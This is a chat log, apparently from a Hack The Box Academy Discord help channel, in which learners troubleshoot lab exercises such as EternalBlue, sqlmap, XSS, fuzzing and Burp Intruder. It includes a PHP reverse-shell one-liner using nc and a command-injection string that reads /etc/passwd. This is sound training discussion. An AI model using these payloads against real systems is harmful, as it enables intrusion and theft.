but Im having a little trouble, could someone pls guide me?
#modules
pine dune
cloud urchin
did you try setting options and then running the exploit?
pine dune
yeah I did
pine dune
yeah it is and yea connected to vpn
cloud urchin
well since you didn't actually say what your issue is i'm running out of ideas. is your monitor on?
pine dune
let me see what the issues is lool
Exploit completed, but no session was created.
i think its something to do with the hname
im not sure if im entering the correct hname
fathom pendant
Exploit completed, but no session was created.
this generally means that your LHOST wasn't correct
pine dune
this generally means that your LHOST wasn't correct
ahh okay let me try again
fathom pendant
it means it was able to get the payload set and executed, but the payload didn't call back
fathom pendant
RHOST
LHOST
these are the two options you generally always need to think about
pine dune
i set it to lhost tun 0 but it didnt work
fathom pendant
never had to configure hname afaik
pine dune
the LHOST
fathom pendant
LHOST is tun0 (no space)
pine dune
yea I set it to tun0
pine dune
ahh I see okay
how do u go about finding the right exploit
Ive just done an nmap scan on the ip and looked for open ports
fathom pendant
i mean search eternalblue in msfconsole
cloud urchin
usually enumerating the services etc
fathom pendant
if it's the one that's dealing with eternalblue/eternalromance
but i genuinely don't recall ms05_017_msmq being the exploit used
pine dune
It had that port open
fathom pendant
yes
if it's eternal blue then SMB is gonna be open
there's several exploits for eternalblue/eternalromance
pine dune
if it's eternal blue then SMB is gonna be open
how do i know if its vulnerable to eternal blue?
fathom pendant
isn't that literally what this section you're doing is about?
also that's what ms05_017 is
pine dune
yeaa
pine dune
maybe they updated the module 😅
fathom pendant
no
pine dune
ahh
fathom pendant
the metasploit module yeah?
fathom pendant
in general you should always try eternal blue when smb is involved
pine dune
these are all the ports
fathom pendant
don't run --script vuln
pine dune
okay
fathom pendant
just run default scripts
plucky hollow
-p-
pine dune
ahh ok cool
fathom pendant
-p-
in this case that's not necessary
this section explicitly tells you which exploit to use
even
might not be in the same exact location as your msfconsole search
but the name will be the same
pine dune
fathom pendant
psexec will generally be the one you go with
pine dune
this section explicitly tells you which exploit to use
Do i have to use the same exploit? I was kinda hoping to use a new/different one
fathom pendant
Do i have to use the same exploit? I was kinda hoping to use a new/different one
no
pine dune
ahh ok
plucky hollow
in this case that's not necessary
He is sure that it is all the ports, but for that he would have to probe them all with -p-
fathom pendant
but there's a handful of exploits related to this vulnerability
you can use any that's related
but msmq is way out of scope
pine dune
im using exploit 4 okay?
fathom pendant
im using exploit 4 okay?
that's literally the only one i would say not to use
pine dune
damn lool why is that
fathom pendant
it's not always accurate 
pine dune
has the highest rank 😅
fathom pendant
He is sure that it is all the ports, but for that he would have to probe them al...
sigh
as someone that's done this module
and this section
i'm not gonna have someone double check for more shit when it's not necessary
fathom pendant
another indicator here is version: Windows 7 - 10 microsoft-ds as an fyi
the windows 7 is the critical part
fathom pendant
it's one thing though to recommend scanning for more ports when what they need to exploit isn't there
plucky hollow
i'm not gonna have someone double check for more shit when it's not necessary
Anyway, it will be useful for him later.
pine dune
plucky hollow
ok
fathom pendant
just RHOST and LHOST need to be set
you don't need to set all the options as in the example, as you can see they're already set by default
pine dune
just RHOST and LHOST need to be set
yay it worked 😄
fathom pendant
pine dune
same problem
fathom pendant
same problem
oh wait
did you set the password and user
forgot that is somewhat important
pine dune
exploit completed but no session
fathom pendant
fathom pendant
ah
it's the wrong exploit completely
look at the example; use that exploit
AS I SAID EARLIER
just windows/smb/psexec
and the question states "using what you learned in this section" (alongside the first question) should lead you to be using exactly the same exploit
unique ether
Any idea why target spawning is taking like so much time
The pwnbox spawned fast but the module machine is taking so much time
Someone please guide it's been on loading forever
hushed sail
Someone please guide it's been on loading forever
how long is forever? it takes a while for the target to spawn. it has to build an environment.
unique ether
how long is forever? it takes a while for the target to spawn. it has to build a...
30 mins now
hard matrix
refresh page and make sure its not just the widget bugged
otherwise change regions and regenerate your vpn key
happens occasionally
hushed sail
30 mins now
yeah, that’s probably too long. try switching servers?
foggy monolith
Having the exact same problem as this person now. Tried using the ||EternalBlue module|| and got back a Connection reset by peer error, tried using windows/iis/iis_webdav_upload_asp as the module suggests only to get a 404 every time. So, if it's not SMB and if it's not IIS, then what is it?
Never mind, running nmap again found another open port that adding the script scan missed.
scarlet jacinth
I have also same problem that spawning target server takes too long. Is anyone having same situation here? It seems there's some technical issue on the background of HTB academy infrastructure.
sacred nymph
I have also same problem that spawning target server takes too long. Is anyone h...
having same issue
scarlet jacinth
having same issue
Thanks for your report. Let's be patient and wait for recovery...
plucky hollow
I am using xsstrike and it tells me: [+] WAF Status: Offline [!] Testing parameter: s [!] Reflections found: 6 [~] Analyzing reflections [~] Generating payloads [!] Payloads generated: 4608
However, I don't know where I can see which payloads resulted in a successful reflection.
cloud urchin
what module/section
plucky hollow
Cross-Site Scripting (XSS)
Skills Assessment
solar zodiac
I wonder if there are any plans for cloud related content in academy 🙂
cloud urchin
Cross-Site Scripting (XSS)
Skills Assessment
idk i did manual enumeration
jade latch
I am using xsstrike and it tells me: ```[+] WAF Status: Offline
[!] Testing para...
xsstrike didn't work for me in the assessment
its a simpler payload than you expect
fathom pendant
Xsstrike is like linpeas or linenum imo, throws a bunch at you that makes things harder to parse
At least if you don't know what you're doing*
plucky hollow
idk i did manual enumeration
Yes, I solved it with manual enumeration a few minutes after the question, but I still have that doubt of not being able to use that tool. Some time before I had also had problems with it and it bothers me not to be able to do it.
safe star
how long should it take to find the "You don't have access!" page in the fuff skill assessment? feels like i been here for hours
uncut ocean
bitlocker2john -i Backup.vhd > backup.hashes
Signature found at 0x1000003
Version: 8
Invalid version, looking for a signature with valid version...
Error while extracting data: No signature found!```why am i getting error ?
fathom pendant
```bash
bitlocker2john -i Backup.vhd > backup.hashes
Signature found at 0x10000...
Perhaps the file got corrupted in transit
uncut ocean
Perhaps the file got corrupted in transit
but why ?? and what i do i simply try get filename
fathom pendant
If you utilize the search feature I've shared the md5sum of backup.vhd
If it doesn't match: file got corrupted in transit
safe star
same happended to me
fathom pendant
but why ?? and what i do i simply try ```get filename```
Could have been a momentary disconnect
safe star
i thought it was done cause i saw the connection come back
uncut ocean
Could have been a momentary disconnect
they are same
fathom pendant
¯_(ツ)_/¯
safe star
wait i think i got it
fathom pendant
Bro it is 2 am and I am not movin
uncut ocean
either that runner machine is also not working i plan to do it again before ippsec video
fathom pendant
wait i think i got it
Also your message had spoilers in it considering you have to fuzz for the subdomain
Also, were you using the right thing
uncut ocean
Time.Started.....: Sat Aug 24 11:24:57 2024 (11 secs)
Time.Estimated...: Thu Sep 19 16:35:15 2024 (26 days, 5 hours)
Estimated time != actual time
Estimated is if it has to go through the whole list
Which it won't
Htb isn't that mean
uncut ocean
ya but i am amazed
uncut ocean
Htb isn't *that* mean
rustic sage
Estimated time != actual time
Actual time could be higher than the estimated time tho
rustic sage
Lol
uncut ocean
You're on the last leg of the journey for that module
which is the most brainfck module according to yu?
limpid frigate
anyone who has finished module Intro to C2 Operations with Sliver, can I get a bit help, kinda stuck
dim wolf
password cracking is probably constant time so if it is longer it's not by a significant amount
uncut ocean
Time.Started.....: Sat Aug 24 11:28:44 2024 (4 mins, 21 secs)
Time.Estimated...: Mon Sep 30 22:40:47 2024 (37 days, 11 hours)
hell no
uncut ocean
perfect password cracking is constant time
means?
dim wolf
it means you are going to wait
uncut ocean
ya i should inject some caffeine
fathom pendant
Not everything is instant gratification
safe star
<:NotLikeThis:479394696473477150>
are u cracking it on ur host os?
uncut ocean
Go walk with the dog or cat
in office ryt now 🤣
safe star
it took me about 12 secs
uncut ocean
are u cracking it on ur host os?
yup
safe star
sterile solstice
it means you are going to wait
Can I DM you for something?
uncut ocean
The password exists in rockyou
ya i am using rockyou
safe star
i was NOT waiting for 14 million passwords 😭
fathom pendant
it exists in both technically
fathom pendant
i was NOT waiting for 14 million passwords 😭
You wouldn't have to bro
safe star
true
fathom pendant
It would stop after it hit the first one
safe star
but i know its in the mutated tho
fathom pendant
Yup
Silent lessons here
Always start small then go big
You have resources from the module, try those first
uncut ocean
okk but like after cracking like i have to mount it ? '
uncut ocean
Finally cracked !
dim wolf
Can I DM you for something?
if it's something i can answer
steady charm
Does anyone know what does a Pwned message in CME or NXC mean specifically on the LDAP protocol?
For SMB it means local admin, for WinRM it means access via WinRM but for LDAP?
cloud urchin
they all mean admin afaik
steady charm
pwned means rce so its probably that it can query ldap
i can query ldap with a non-pwned message user
steady charm
they all mean admin afaik
that's what confused me, the user has no admin anywhere, yet BloodHound marks it as a high value user part of a tier 0 group. yet I have no idea what this user can even do
cloud urchin
pwned means admin
steady charm
and how do you "leverage" admin on LDAP do say
cloud urchin
hash dump is a good one
actually not sure you can hash dump with ldap
you can do crackmapexec ldap -L to see the modules
eager ledge
Hi, I am doing this module: https://academy.hackthebox.com/module/58/section/526
I am using sqlmap, but sqlmap is detecting the column name wrong. It is off by one character due to which the data is not dumped correctly. Did any of you also face the same issue?
cloud urchin
yeah i think i just inferred the answer with leetspeak
steady charm
Via nxc I need SMB rights to dump hashes. But I see there might be a way to do it via LDAP as well but different tool
cloud urchin
cme ldap is great for enumeration stuff
steady charm
yeah but i can enumerate without having the pwned message. my guess is I have write DACL privileges
cloud urchin
yeah that's correct. but pwned means admin account so you can enumerate more
fathom pendant
yeah i think i just inferred the answer with leetspeak
Yeah iirc it's bc of the attack used to get the answer
I think I asked Jared about it or posted an #1234357888114364508 a while ago
cloud urchin
Yeah iirc it's bc of the attack used to get the answer
Yeah I think so. It mangles the data.
fathom pendant
It's dumb lol
eager ledge
Every time I run the same command, I am getting different values(off by one). Does this mean that we cannot completely rely on sqlmap if the attack is blind?
misty current
Every time I run the same command, I am getting different values(off by one). Do...
Yes, that’s why you have to run it a couple of times
There’s also a tool called Ghauri, which sometimes works better than sqlmap with blind types
eager ledge
Thanks!
sterile solstice
yeah but i can enumerate without having the pwned message. my guess is I have wr...
you can also changed the msg as well. i changed mine to 'OWNED!' . figured it would look better for screenshots lol
there are some commands in LDAP that will local require admin, i.e. getting list for trusted delegation, password-not-required, gmsa.
steady charm
you can also changed the msg as well. i changed mine to 'OWNED!' . figured it wo...
at work I have it as Local Administrator
steady charm
there are some commands in LDAP that will local require admin, i.e. getting list...
yeah for this kind of answer i was looking for, thanks
sterile solstice
no problem. i dont use the LDAP query much. you can do hash dumps with the smb protocol. though for NDTS im unsure if thats in LDAP or not.
i do recommend the CME course. im 3/4 through it, but loving it. its been super useful.
high warren
Hi, anyone can help ? Idk why the version's not showing
misty current
Hi, anyone can help ? Idk why the version's not showing
I've seen some others face this, respawning the target fixed it for them. You can try that
high warren
Still not appearing
marsh echo
You tried with -p 53 —script dns-nsid —sSU
bright pivot
sqlmap 'http://94.237.60.129:45661/case2.php' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.60.129:45661/case2.php' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://94.237.60.129:45661' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'id=2' -batch-dump -T flag2
why i cannot find the flag with this command ?
wary plover
sqlmap 'http://94.237.60.129:45661/case2.php' --compressed -X POST -H 'User-Agen...
-T specifies a tablename, i'm not certain but maybe the tables are named differently
gray yacht
sqlmap 'http://94.237.60.129:45661/case2.php' --compressed -X POST -H 'User-Agen...
If I'm not mistaken batch and dump should be used with --batch --dump
split pollen
getting stuck on the getting started module in the pen test career path on the knowledge check page... https://academy.hackthebox.com/module/77/section/859
I've made it into the admin portal of the target, and am trying to modify the Theme template.php by adding a php reverse shell one-liner.. <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 9443 >/tmp/f"); ?> .. when I do this, the page won't load at all
so I tried using <?php system('id'); ?> which works perfectly fine and I can see the ID in the home page..
bright coral
I've made it into the admin portal of the target, and am trying to modify the Th...
that doesn't look like the IP of the tun0 interface
split pollen
I have openvpn running on my local machine, vm is running the attack which has that IP
no problems reaching the target on the vm and that IP can ping the target
bright coral
no problems reaching the target on the vm and that IP can ping the target
Yes, but the target is trying to reach back to you this time.
It does not know that the IP of your VM is behind the IP of your host system.
bright coral
no problems reaching the target on the vm and that IP can ping the target
Best and easiest solution would be to run the VPN within your VM
split pollen
lol I've literally been on this for like 2 hours..
that worked 🥲
the vpn should be a split tunnel, right? I quit using it inside my vm bc I can only reach the internal network.. anything external gives me an unknown host error
bright coral
the vpn should be a split tunnel, right? I quit using it inside my vm bc I can *...
yes, you should be able to see that with ip route
split pollen
that's weird.. does parrot have vpn settings by default to block all external network traffic when vpn is enabled?
vocal bridge
the owasp hud doesnt show me the tools anymore and i have to do it from the zap application did i do something wrong?
bright coral
that's weird.. does parrot have vpn settings by default to block all external ne...
No clue, I have never used Parrot, but I highly doubt that
split pollen
thoughts on troubleshooting? again, with vpn on, only internal network traffic is being allowed
bright coral
thoughts on troubleshooting? again, with vpn on, only internal network traffic i...
Check the default gateway and DNS server (its always DNS)
split pollen
10.10.0.0 is default gateway?
bright coral
10.10.0.0 is default gateway?
if it is, then that's your problem
bright coral
no, looks like it's 10.10.14.1
let's move this to DM to not clutter this channel
rustic sage
sorry if asking in wrong channel but where do i start with learning in htb? all i know my linux basics + pentesting basics
split pollen
choose a path or a module that's interesting and start learning 🙂
rustic sage
well i need from the very start like a whole guideline cause im very confused
split pollen
what's your end goal? certs? learning?
vocal bridge
i can't figure out how to write the request in the url in a way that it gives me the flag
trim frost
i can't figure out how to write the request in the url in a way that it gives me...
you were able to see /etc/passwd, right?
vocal bridge
you were able to see /etc/passwd, right?
yea.
trim frost
yea.
ok so you have access to the system on some way, you just have to look for the flag in normal locations
vocal bridge
i just don't get how to rewrite the request to give me the flag. just writing &cat /flag.txt& doesnt work
i have to parse it somehow but i cant remember how
trim frost
so I don't know zap but decoder in burpsuite (or even cyberchef) can help with encoding your commands
magic girder
I'm Japanese, but I want to make a hack BOT, please let me know.
vocal bridge
so I don't know zap but decoder in burpsuite (or even cyberchef) can help with e...
alr so i decoded the url request, changed it to /flag.txt encoded it back but it gave me nothing
trim frost
did you try ls
wise vault
Exploitation & Privilege Escalation section of Attacking Enterprise Network. question is how i can broswer the 172.x.x.x with proxychains?
any hint?
vocal bridge
did you try `ls`
blank page
i can't figure out how did zap encode it
when i run it through cyberchief(i decoded and encoded back) it changes my request and it doesn't work anymore
trim frost
so do you know what %26 is decoded?
trim frost
so unix commands in general are separated by ; so you are asking the system to ping 127.0.0.01 then ; then <insert another command here>
vocal bridge
so unix commands in general are separated by `;` so you are asking the system to...
wasnt it & or | ?
trim frost
| is to pipe output to intput
& is to put something in the background
so basically when you are doing command injection, you are saying 'sure sure, here ping this but then give me my command'
so you do ping 127.0.0.1;cat /etc/passwd; initially
now you want to see what is in the root directory (/), you want to take the above and modify it to do ls /
vocal bridge
it worked using ;
vocal bridge
so basically when you are doing command injection, you are saying 'sure sure, he...
cheers for letting me know
i just cant figure out why when i decoded it took ; as &
trim frost
interesting
vocal bridge
interesting
i can send you the cyberchef screenshots in dm if you'd like
or leave them here
trim frost
nah its ok, I usually just use burpsuite decoder unless I need other encoding types
silent falcon
need a hnint in api attack skill assessment, guys
alpine summit
Hello I'm stuck too. Can I send you a PM to see if I'm on the right track?
gray yacht
need a hnint in api attack skill assessment, guys
You can DM me what you've done.
autumn plume
Has anyone solved Sea machine
fathom pendant
Has anyone solved Sea machine
Read and follow #welcome ; #1271890150863143096
split pollen
working on a write-up for this lab https://academy.hackthebox.com/module/77/section/859
in the final section, I've found how to get the root flag, but I'm unable to upgrade my TTY.. probably how I've started my admin shell, but am I allowed to show the code?
fathom pendant
You're root brother
split pollen
ya I've got the flag, the terminal is just all fucky tho
fathom pendant
Wdym "fucky"
split pollen
in the second picture.. the blinking [] showing where you'd normally type in the line is beneath the root@gettingstarted:...
fathom pendant
You get used to those things, you're not in a perfect shell
split pollen
so anything I type isnt actually coming on the line I can see
fathom pendant
I generally haven't gone as far as upgrading shell with background/stty
Usually just the python upgrade works for me
split pollen
ocd 😛
fathom pendant
Deleted your images as they contain the command to privesc
Also ocd is a killer in this field
You will have to deal with imperfections
Especially with reverse shells
fathom pendant
They aren't exactly stable
The barebones minimum is it runs the command you tell it
If you want a stable shell see if there's an id_rsa in the /root/.ssh directory
fading kettle
Good morning, I am struggling with the Windows event logs module question 1 "Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe"
Steps taken so far: I filtered the security logs by Event ID. I then found the event 4624 identified in the prompt. Took screenshots so I have the Logon ID. From there I need to find the executable. When I filter by the Logon ID I found using the XML query example listed in the module there are still thousands of events. I tried honing in on event IDs 4907 originating from the login ID I grabbed but there are still 100s of entries none of which are matching the prompt. Does anyone have any advice on what to try/additional resources I should take a look at? Already read the linked articles in the module. Thanks!
fathom pendant
Good morning, I am struggling with the Windows event logs module question 1 "Ana...
Basically replicate everything from the section, substituting the found ID where applicable
Also make sure you're looking against the right event id
fathom pendant
Good morning, I am struggling with the Windows event logs module question 1 "Ana...
Make sure you look around the same time as well
fading kettle
Great thank you very much for the quick response and those links, diving back in!
fathom pendant
Not saying either of those would be right/wrong
Just offering insight on what logs may contain data about an exe
fading kettle
Yeah that is super helpful no matter if they are the ones. I am also going to pay closer attention to the date/time to try and narrow that down, thank you again.
fathom pendant
Mhm
slate halo
Im doing Attacking Thick Client Applications and I cannot find the Matt user after running the command .\Restart-OracleService.exe also in Procmon64 I get this C:\Users\cybervaca\AppData\Local\Temp\69DD.tmp\69DE.tmp\69E0.tmp
vocal bridge
I cant figure out a way to both add the character to the cookie and encode the entire cookie at the same time in burp
i tried using cluster type attack but didnt work
marsh echo
Im doing Attacking Thick Client Applications and I cannot find the Matt user aft...
The user of the example is Matt but it’s not your case replace the user with the name of the cybervaca user and disables inheritance in the temp directory in the options so that everything is displayed in the same directory as indicated in the course
Then you will have to modify the .bat file
marsh echo
I cant figure out a way to both add the character to the cookie and encode the e...
What is section and module ?
vocal bridge
What is section and module ?
Skills Assessment - Using Web Proxies
marsh echo
Skills Assessment - Using Web Proxies
Shit I didn’t take notes for the skill assessment I’ll do it again and I’ll tell you again by then if no one helped you
slate halo
The user of the example is Matt but it’s not your case replace the user with the...
i have to change the cybervaca to Matt? Also I cannot change the inheritance because its already disabled
jade latch
yes
vocal bridge
Shit I didn’t take notes for the skill assessment I’ll do it again and I’ll tell...
i looked up a walkthrough and got the idea to use the decrypted cookie as prefix and select the cookie in the request as payload for all alphanum characters but it gives no response
trim frost
well so what you are supposed to do there is you have 31 characters, you add a character, then encode it in the same order you decoded it
is that what you did? does what you are sending back look like the expected encoded character?
marsh echo
i have to change the cybervaca to Matt? Also I cannot change the inheritance bec...
What I did was that I disabled inheritance at the time of cybervaca and I was able to have the file in a directory named with a number (me it was 2)
vocal bridge
well so what you are supposed to do there is you have 31 characters, you add a c...
these are the payload settings
jade latch
well so what you are supposed to do there is you have 31 characters, you add a c...
i think you mean decoding it after adding a character?
trim frost
these are the payload settings
ok so that looks right
but then you are going to have 62 responses, one of those responses will look right
or one of those responses will stand out and look right
trim frost
i think you mean decoding it after adding a character?
they are doing it right, encoding after adding character
vocal bridge
nvm i figured it out
marsh echo
What I did was that I disabled inheritance at the time of cybervaca and I was ab...
Also uncheck the delete subfolder and files option and delete in display advanced permissions
vocal bridge
nvm i figured it out
it was intruding on the whole site not just /admin.php
maybe this fixes it
slate halo
What I did was that I disabled inheritance at the time of cybervaca and I was ab...
well I have only to enable inheritance is this normal?
trim frost
oh oops
jade latch
well I have only to enable inheritance is this normal?
if it was already disabled then it's not normal, but you can go forward or restart if you're paranoid
marsh echo
i looked up a walkthrough and got the idea to use the decrypted cookie as prefix...
Look carefully once you have disabled the inheritance you must click on convert inherited permissions into explicit permission on this object -> Edit-> display advanced permissions and from there you can uncheck the boxes delete subfolders and delete
vocal bridge
Look carefully once you have disabled the inheritance you must click on convert ...
huh?
marsh echo
huh?
Oops, I was talking to @slate halo sry
For using proxy I redo the skill assessment I made the mistake of not taking notes 🤦🏾♂️
vocal bridge
but then you are going to have 62 responses, one of those responses will look ri...
nah
didn't work. no response
trim frost
yeah but you said you were doing wrong url, right?
fathom pendant
but then you are going to have 62 responses, one of those responses will look ri...
A handful of them give the answer afaik
trim frost
yeah I think it is more than one
fathom pendant
Afterwards it's just adding the cookie to browser to bypass login
vocal bridge
A handful of them give the answer afaik
yea i just cant figure out how to configure the burp intruder to work
fathom pendant
Well once you get the cookie
Also intruder has 2 tabs
Request and response
Instead of viewing the request, view the response :)
You can also filter response size
vocal bridge
Instead of viewing the request, view the response :)
it gives no response
i think i forgot to send a pic
instead of a response it says it produced and error
fading cipher
Im working on Information Gathering - Web Edition - Skill Assessment.
Is there something I have to do to get tools to properly work on it. I am not getting anything from subdomain enumeration, reconspider or finalrecon.
I have the hosts ip with inlanefreight.htb on /etc/hosts...
gray yacht
it gives no response
You can DM your intruder config if you'd like.
vocal bridge
You can DM your intruder config if you'd like.
already posted it
vocal bridge
these are the payload settings
.
fathom pendant
Are you sure you're encoding them in the right order?
gray yacht
already posted it
And what are you getting when you run it? You can DM that if you'd like.
vocal bridge
Are you sure you're encoding them in the right order?
first base 64 then ascii
vocal bridge
And what are you getting when you run it? You can DM that if you'd like.
response 0
no code
hard matrix
Im working on **Information Gathering - Web Edition** - Skill Assessment.
Is the...
what are you looking for help with exactly
vocal bridge
Is that the reverse order you decoded in?
in this order cyberchef decoded it
cloud urchin
that's hex and base64
fathom pendant
^
fading cipher
what are you looking for help with exactly
Specifically I am on Q3 but like I mentioned I am having issues (it appears) getting anything out of the webserver. It appears to only have the index page
gray yacht
response 0
There's just one more thing I would check in your intruder settings.
fathom pendant
that's hex and base64
Ascii hex is selected
cloud urchin
ahh yeah
fathom pendant
As the second encoder
cloud urchin
sorry i haven't had my coffee yet
hard matrix
Specifically I am on Q3 but like I mentioned I am having issues (it appears) get...
feel free to dm me
cloud urchin
when i hear ascii i think text pics haha
fathom pendant
Im working on **Information Gathering - Web Edition** - Skill Assessment.
Is the...
Did you check your robots?
Also if you don't find something, fuzz for subdomains
Add the subdomain to /etc/hosts --> repeat
fading cipher
I am not finding anything on the subdomains either
fathom pendant
What is your syntax?
fading cipher
and theres no robots
fathom pendant
For fuzzing
fading cipher
for directories
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://inlanefreight.htb:45187/FUZZ -recursion-depth 5
for subdomain
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://FUZZ.inlanefreight.htb:45187
fathom pendant
That's wbt it's not working
That's not how you fuzz vhosts
-H "Host: FUZZ.inlanefreight.htb"
cloud urchin
his -u parameter needs to be changed too
fathom pendant
Yeah sorry I was eating something
fading cipher
let me try that
cloud urchin
review the vhost enumeration section again and it'll give you the command
fathom pendant
-u http://inlanefreight.htb:port -H "HOST: FUZZ.inlanefreight.htb"
fathom pendant
gobuster vhost command not gobuster dns
fading cipher
gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
fathom pendant
```gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discover...
Replace :81 with the port
fading cipher
yea i know
fathom pendant
The :81 is just to show you can specify the port
fading cipher
its just the copy paste from the notes lol
vocal bridge
There's just one more thing I would check in your intruder settings.
the built in browser keeps giving error codes 400 everytime i enter the site for no reason on zap
i think imma just give up for now
fading cipher
-u http://inlanefreight.htb:port -H "HOST: FUZZ.inlanefreight.htb"
This works, but the go buster still doesn't work
actually I think the ffuf doesnt work either
vocal bridge
move on and maybe do it later. i think i got the jist of it
cloud urchin
the built in browser keeps giving error codes 400 everytime i enter the site for...
400 means the server got your request, but it's a bad request.
fading cipher
its giving 200 on everything it looks like
gray yacht
the built in browser keeps giving error codes 400 everytime i enter the site for...
Dude I just spun it up for funsies and got it. Don't give up yet.
vocal bridge
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/400
my request is http://ip:port so its a good request
cloud urchin
that's all you have in your request? that is not a valid request
fathom pendant
its giving 200 on everything it looks like
Filter by response size
-fs <common size you see>
vocal bridge
Dude I just spun it up for funsies and got it. Don't give up yet.
literally how I cant comprehend what i am doing wrong. i even looked up a video of someguy doing it, did exactly waht he did and got nothing. this and the first question keep bugging me because i dont get what im doing wrong
gray yacht
literally how I cant comprehend what i am doing wrong. i even looked up a video ...
I'm not using ZAP, so I could help walk you through it in Burp. Just let me know.
vocal bridge
I'm not using ZAP, so I could help walk you through it in Burp. Just let me know...
if you can dm me what you did in burp i would appreaciate it
cloud urchin
if you can dm me what you did in burp i would appreaciate it
I looked at your pic and the question, you're trying to replace the whole cookie instead of just the last character like the question tells you to
the question says it's a md5 hash that's missing the last character, and in sniper you have the entire cookie selected instead of fuzzing just the last character.
vocal bridge
I looked at your pic and the question, you're trying to replace the whole cookie...
i assigned the whole cookie as payload, put the cookie as prefix, put the alphanum case.txt as payload and added the encodings
vocal bridge
the question says it's a md5 hash that's missing the last character, and in snip...
well you have to add the missing character then encode the whole cookie
gray yacht
if you can dm me what you did in burp i would appreaciate it
I'll send you a DM, but I'm going to nudge you in the right direction.
vocal bridge
I'll send you a DM, but I'm going to nudge you in the right direction.
fair enough
fathom pendant
I looked at your pic and the question, you're trying to replace the whole cookie...
He put the md5 prefix on
cloud urchin
ok i see that in the other pic. this pic still looks weird to me. he has a cookie: header with a value of phpssid and then another cookie value so it looks weird to me but i can't remember off the top of my head if it's supposed to be that way. the module and section would help a lot.
fathom pendant
Yeah it's silly
cloud urchin
i found it, web proxies. looks like it is supposed to be that way.
fathom pendant
Yeah
¯_(ツ)_/¯
Ik there's some that should give an output
Been a minute though
marsh echo
i assigned the whole cookie as payload, put the cookie as prefix, put the alphan...
I think I understand your problem when you fuzz with intruder the last character to be found in the ALPHA-NUME CASE list must first be encoded in hex.
cloud urchin
each payload gives a response, but only one has the flag
fathom pendant
Ye
cloud urchin
there's also a step he needs to perform before that fuzz will work
trim frost
I thought I did it like they did, added character then encoded entire string
cloud urchin
not sure if he did that or not
trim frost
but think ricky is helping them out
cloud urchin
fair enough
can you delete those pics? they kinda spoil the skill assessment
static light
Hey what do I do if the verification link to my email isn’t working??
cloud urchin
Hey what do I do if the verification link to my email isn’t working??
Probably reach out to support staff
fathom pendant
¯_(ツ)_/¯
vocal bridge
I think I understand your problem when you fuzz with intruder the last character...
nvm it worked just had to uncheck the bottom checkbox at the bottom of intruder
also i think i encoded in the wrong order
shit happens
cloud urchin
now you will never forget
trim frost
yup
fathom pendant
nvm it worked just had to uncheck the bottom checkbox at the bottom of intruder
encode special characters?
sturdy cobalt
Anyone willing to donate me a voucher on htb ehehehehe
vocal bridge
> encode special characters?
i think this is what did it
fathom pendant
Anyone willing to donate me a voucher on htb ehehehehe
Nope
sturdy cobalt
It's bad when you run out of cubes
cloud urchin
very important setting
fathom pendant
sturdy cobalt
But spending money will prevent that
In Brazil, spending in dollars has to be rich
fathom pendant
¯_(ツ)_/¯
trim frost
I think they said you can win a silver membership during trivia
so maybe look for opportunities to win cubes/membership
cloud urchin
you can also win stuff through #giveaways
sturdy cobalt
you can also win stuff through <#765204501648637972>
I don't have access, it must be because I'm new to the server
fathom pendant
I don't have access, it must be because I'm new to the server
Read and follow #welcome
rustic sage
Hello! I'm in the "Linux Fundamentals" module and I have come across a confusing question.
I have to download the contents of a webiste (https://www.inlanefreight.com/) and count all the unique paths of this domain
so far I have tried this curl https://www.inlanefreight.com/ > inlanefreight.txt followed by cat inlanefreight.txt | grep https://www.inalanefreight.com/ | sort -u | wc -l
it doesn't seem to work
trim frost
what section is this? usually the commands and what not are within the section
rustic sage
do you guys have any hints i could use? i don't want the straight up answer, just something i could use to advance
rustic sage
what section is this? usually the commands and what not are within the section
Filtering Content.
trim frost
downloading an entire website seems extreme
rustic sage
it's a small file
static light
how do I contact hackthebox support through email?
rustic sage
22266 (the size)
acoustic owl
do you guys have any hints i could use? i don't want the straight up answer, jus...
Look at the source code. It can also have other domains or relative paths
compact patrolBOT
acoustic owl
how do I contact hackthebox support through email?
^
trim frost
yeah sounds like source code is the way
rustic sage
i'm seeing a lotta href's and src's using that path
there are also many that are just https://www.inlanefreight.com/ without anything following it
rustic sage
are those also paths of the domain or just the domain itself?
trim frost
href would be a link
acoustic owl
If I contact them through email they won’t respond till Monday right??
Support works reduced hours at the weekend
acoustic owl
href would be a link
src=„path/to/file.jpg“ is also a path
static light
Support works reduced hours at the weekend
I’m just tryna get the student discount but the verification link isn’t working 😭
rustic sage
href would be a link
then i should filter with grep by doing "href='https://www.inlanefreight.com/'" ?
this is pretty difficult for me at the current moment haha
i cant wait to look back on this day in a few years and realize how i've grown. but first i gotta solve it 💀
trim frost
I'm looking at it now, I'll say one thing you'd want to do is do a bit of trial and error
so you kind of do a grep, see what you see, then try to figure out what to make of that
acoustic owl
I’m just tryna get the student discount but the verification link isn’t working ...
Then you have to contact support and wait. This is not something we can solve on Discord
rustic sage
cat inlanefreight.txt | grep "href\|src='https://www.inlanefreight.com" | sort -u | wc -l
this didn't work either
wait i see why
trim frost
well you got a lot of junk there
rustic sage
there are also href and srcs with double quotes instead of single quotes
static light
Then you have to contact support and wait. This is not something we can solve on...
I know I emailed them
acoustic owl
`cat inlanefreight.txt | grep "href\|src='https://www.inlanefreight.com" | sort ...
Check out all the other filter options discussed in the module
rustic sage
there was another path with double quotes, 60 in total, but that's not the correct answer either
trim frost
you got cut, tr, awk all available to you
what if I said your goal was to just get the url?
rustic sage
